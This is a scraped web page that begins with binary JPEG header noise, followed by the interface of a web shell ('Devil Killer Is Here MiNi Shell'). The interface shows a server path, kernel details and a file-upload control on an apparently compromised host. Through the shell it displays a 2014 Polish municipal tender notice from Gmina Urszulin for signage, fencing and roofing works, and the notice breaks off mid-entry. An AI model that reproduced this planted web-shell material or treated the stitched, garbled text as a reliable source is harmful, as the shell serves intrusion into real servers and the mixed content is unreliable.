JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/100301-N-2014.html

<p class="kh_header"><b>Urszulin: Wykonanie  witaczy i  tablic informacyjnych na terenie gminy Urszulin w ramach projektu Po pracy Polesie-zwiększenie atrakcyjności turystycznej obszaru Polesia Zachodniego, budowa ogrodzenia i zagospodarowania placu gminnego w Urszulinie oraz  wymiana pokrycia dachowego na budynku gimnazjum w Zespole Szkół w miejscowości Urszulin.</b><br>
<b>Numer ogłoszenia: 100301 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urszulin , ul. Kwiatowa 35, 22-234 Urszulin, woj. lubelskie, tel. 082 5713001, faks 082 5713001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurszulin.bip.mbnet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  witaczy i  tablic informacyjnych na terenie gminy Urszulin w ramach projektu Po pracy Polesie-zwiększenie atrakcyjności turystycznej obszaru Polesia Zachodniego, budowa ogrodzenia i zagospodarowania placu gminnego w Urszulinie oraz  wymiana pokrycia dachowego na budynku gimnazjum w Zespole Szkół w miejscowości Urszulin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu wraz z ustawieniem witaczy i  tablic informacyjnych na terenie gminy Urszulin, budowę ogrodzenia i zagospodarowania placu gminnego w Urszulinie oraz  wymianę pokrycia dachowego na budynku gimnazjum w Zespole Szkół w  Urszulinie, do wykonania w trzech zadaniach inwestycyjnych.

ZADANIE NR 1
WYKONANIE WRAZ Z USTAWIENIEM WITACZY I  TABLIC INFORMACYJNYCH NA TERENIE GMINY URSZULIN

Przedmiotem zamówienia jest wykonanie  wraz z ustawieniem 2 szt. witaczy oraz 78 szt.  tablic informacyjnych na terenie gminy Urszulin.
Określenie przedmiotu oraz wielkości lub zakresu zamówienia:

1. Witacze w ilości 2 sztuk  należy wykonać i zamontować w miejscowościach Borysik i Wytyczno, gmina Urszulin. 
Szczegółowy opis przedmiotu zamówienia zawarty jest  w materiałach zgłoszeniowych, opisie technicznym i  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.


2. Tablice informacyjne wzór nr 1.  Znaki -  słupki wskazujące najważniejsze miejsca w gminie, dwuramienne w ilości 12  szt., na ramionach umieszczone zostaną tabliczki informacyjne stalowe wypukłe.  W  skład kompletu wchodzi  wykonanie  48 szt. tabliczek metalowych wraz z napisami, zabezpieczeniem antykorozyjnym oraz montażem  do sklejki wodoodpornej.   Treść napisów oraz miejsca montażu  słupków zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
3. Tablice informacyjne wzór nr 2.  Znaki -  słupki drewniane  stanowiące oznakowanie tras turystycznych   w gminie Urszulin , w ilości 30 szt. ustawione na fundamentach , mocowane na kotwach do fundamentów  tabliczki ze sklejki wodoodpornej.  Miejsca montażu  słupków zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
4.	Tablice informacyjne wzór nr 3.  Znaki o konstrukcji słupów  drewnianych  stanowiące oznakowanie tras turystycznych   w gminie Urszulin , w ilości 10 szt. ustawione na fundamentach, mocowane na kotwach do fundamentów  bez tablic metalowych.  Miejsca montażu  tablic zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
5.	Tablice informacyjne wzór nr 4.  Znaki -  słupy drewniane  stanowiące oznakowanie tras turystycznych   w gminie Urszulin , w ilości 15 szt. ustawione na fundamentach , mocowane na kotwach do fundamentów, rzeźbiona treść  napisu Poleski szlak konny.  Miejsca montażu  słupów zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
6.	Tablice informacyjne wzór nr 5.  Znaki o konstrukcji słupów  drewnianych  stanowiące oznakowanie terenu  gminy Urszulin , tablice informacyjno-promocyjne w ilości 11 szt. ustawione na fundamentach, mocowane na kotwach do fundamentów  bez tablic metalowych.  Miejsca montażu  tablic zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.

ZADANIE NR 2
BUDOWA  OGRODZENIA I ZAGOSPODAROWANIA PLACU GMINNEGO W URSZULINIE 

Przedmiotem zamówienia jest wykonanie ogrodzenia z przęseł ogrodzeniowych  panelowych  wraz z zagospodarowaniem placu gminnego na działkach nr  ewid.  87  i nr 88/1 w miejscowości  Urszulin.

Określenie przedmiotu oraz wielkości lub zakresu zamówienia:

Zamówienie obejmuje swoim zakresem budowę  420 m ogrodzenia panelowego  z siatki ocynkowanej ( grubość drutu 5 mm )  zgrzewanej o  wysokości 173 cm , dwóch bram z profili stalowych ocynkowanych długości 6,0 m. Zagospodarowanie terenu obejmuje dowiezienie gruntu  w celu wyrównania i  podniesienia niwelety,  przemieszczanie i plantowanie powierzchni gruntu w celu nadania odpowiedniego spływu wód opadowych.   

Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót  - stanowiącym Załącznik Nr 1a do SIWZ.


Wykonawca jest zobowiązany do zapewnienia obsługi geodezyjnej podczas prowadzenia robót i sporządzenia powykonawczej inwentaryzacji geodezyjnej przez upoważnioną jednostkę geodezyjną zgodnie z §19, §20 i § 21 Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. nr 25 z 1995 r. poz. 133). Dokumentacja geodezyjno-kartograficzna sporządzona w wyniku geodezyjnej inwentaryzacji powykonawczej musi zawierać dane umożliwiające wniesienie zmian na mapę zasadniczą, do ewidencji gruntów i budynków (wykaz zmian gruntowych) oraz do ewidencji sieci uzbrojenia terenu.


ZADANIE NR 3
WYMIANA POKRYCIA DACHOWEGO NA BUDYNKU ZESPOŁU SZKÓŁ W  URSZULINIE

Określenie przedmiotu oraz wielkości lub zakresu zamówienia:

 W zakres zamówienia wchodzi:
- usunięcie istniejącego pokrycia dachowego, obróbek i rynien;
- wykonanie pokrycia z folii paroprzepuszczalnej;
- nabicie kontr łat;
- pokrycie dachu blachą płaską powlekaną;
- wykonanie niezbędnych obróbek blacharskich;
- montaż kompletnego orynnowania;
- wymiana desek okapowych i wiatrowych;
- montaż nowej podbitki;
- wykonanie zadaszenia tarasu.

Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarze robót - stanowiącym Załącznik Nr 1b do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.27.00-2, 45.11.30.00-2, 45.10.00.00-8, 45.21.00.00-2, 45.21.42.00-2, 45.26.12.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu   lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  lub wykonuje najmniej jedną robotę budowlaną  polegającą na wykonaniu  wraz z ustawieniem tablic informacyjnych (wraz z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów, że robota ta została wykonana w sposób należyty i prawidłowo ukończona) lub że Wykonawca wykaże, że w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje jedną  robotę budowlaną polegającą na budowie lub przebudowie więźby dachowej (wraz z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów, że robota ta została wykonana w sposób należyty oraz wskazujących, czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona) w zakresie  - roboty  polegającej wykonaniu  wraz z ustawieniem tablic informacyjnych.  o wartości  min.  80 tys. zł dotyczy zadania nr 1,  oraz robót budowlanych przy  budowie lub przebudowie więźby dachowej o  wartości min. 90 tys.  zł. brutto -  dotyczy zadania nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje lub będzie dysponował w okresie wykonywania zamówienia co najmniej 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, do  kierowania robotami w specjalności  konstrukcyjno - budowlanej  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów - przynależność do Polskiej Izby Inżynierów Budownictwa dotyczy zadania nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian istotnych postanowień umowy 
w stosunku do treści oferty, na podstawie której dokonany zostanie wybór wykonawcy:
a) zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej takimi samymi uprawnieniami.
b) zmiany podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy 
na innego legitymującego się takimi samymi kwalifikacjami /doświadczeniem zawodowym po uprzedniej akceptacji Zamawiającego.
c) zmiany terminów wykonania zamówienia z przyczyn zewnętrznych /np. warunki atmosferyczne/ niezależnych od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac. Termin wykonania umowy może wówczas ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu umowy w sposób należyty. 
 Zamawiający dopuszcza zmianę wynagrodzenia tylko w następujących przypadkach:
a)wystąpienia robót zamiennych,
b)rezygnacji z realizacji części robót,
c)zmiany stawki podatku VAT wynikającej z obowiązującego prawa.
 Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień umowy, jeżeli proponowana zmiana może wpłynąć na opóźnienie lub obniżenie jakości przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurszulin.bip.mbnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Urszulin 22-234 Urszulin  ul. Kwiatowa 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 12:00, miejsce: Sekretariat Gminy Urszulin 22-234 Urszulin  ul. Kwiatowa 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie nr 1 finansowane jest  ze środków Regionalnego Programu Operacyjnego Województwa Lubelskiego  na lata 2007 - 2013, Oś Priorytetowa VII Kultura, turystyka i współpraca międzyregionalna. Działanie 7.1.  Infrastruktura kultury i  turystyki, Kategoria III - Infrastruktura turystyki - projekty lokalne RPO WL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYKONANIE WRAZ Z USTAWIENIEM WITACZY I  TABLIC INFORMACYJNYCH NA TERENIE GMINY URSZULIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie  wraz z ustawieniem 2 szt. witaczy oraz 78 szt.  tablic informacyjnych na terenie gminy Urszulin.
Określenie przedmiotu oraz wielkości lub zakresu zamówienia:

1. Witacze w ilości 2 sztuk  należy wykonać i zamontować w miejscowościach Borysik i Wytyczno, gmina Urszulin. 
Szczegółowy opis przedmiotu zamówienia zawarty jest  w materiałach zgłoszeniowych, opisie technicznym i  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.


2. Tablice informacyjne wzór nr 1.  Znaki -  słupki wskazujące najważniejsze miejsca w gminie, dwuramienne w ilości 12  szt., na ramionach umieszczone zostaną tabliczki informacyjne stalowe wypukłe.  W  skład kompletu wchodzi  wykonanie  48 szt. tabliczek metalowych wraz z napisami, zabezpieczeniem antykorozyjnym oraz montażem  do sklejki wodoodpornej.   Treść napisów oraz miejsca montażu  słupków zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
3. Tablice informacyjne wzór nr 2.  Znaki -  słupki drewniane  stanowiące oznakowanie tras turystycznych   w gminie Urszulin , w ilości 30 szt. ustawione na fundamentach , mocowane na kotwach do fundamentów  tabliczki ze sklejki wodoodpornej.  Miejsca montażu  słupków zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
4.	Tablice informacyjne wzór nr 3.  Znaki o konstrukcji słupów  drewnianych  stanowiące oznakowanie tras turystycznych   w gminie Urszulin , w ilości 10 szt. ustawione na fundamentach, mocowane na kotwach do fundamentów  bez tablic metalowych.  Miejsca montażu  tablic zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
5.	Tablice informacyjne wzór nr 4.  Znaki -  słupy drewniane  stanowiące oznakowanie tras turystycznych   w gminie Urszulin , w ilości 15 szt. ustawione na fundamentach , mocowane na kotwach do fundamentów, rzeźbiona treść  napisu Poleski szlak konny.  Miejsca montażu  słupów zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
6.	Tablice informacyjne wzór nr 5.  Znaki o konstrukcji słupów  drewnianych  stanowiące oznakowanie terenu  gminy Urszulin , tablice informacyjno-promocyjne w ilości 11 szt. ustawione na fundamentach, mocowane na kotwach do fundamentów  bez tablic metalowych.  Miejsca montażu  tablic zostaną uzgodnione w trakcie realizacji umowy  z Zamawiającym.  Szczegółowy opis przedmiotu zamówienia zawarty jest  w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> BUDOWA  OGRODZENIA I ZAGOSPODAROWANIA PLACU GMINNEGO W URSZULINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie ogrodzenia z przęseł ogrodzeniowych  panelowych  wraz z zagospodarowaniem placu gminnego na działkach nr  ewid.  87  i nr 88/1 w miejscowości  Urszulin.

Określenie przedmiotu oraz wielkości lub zakresu zamówienia:

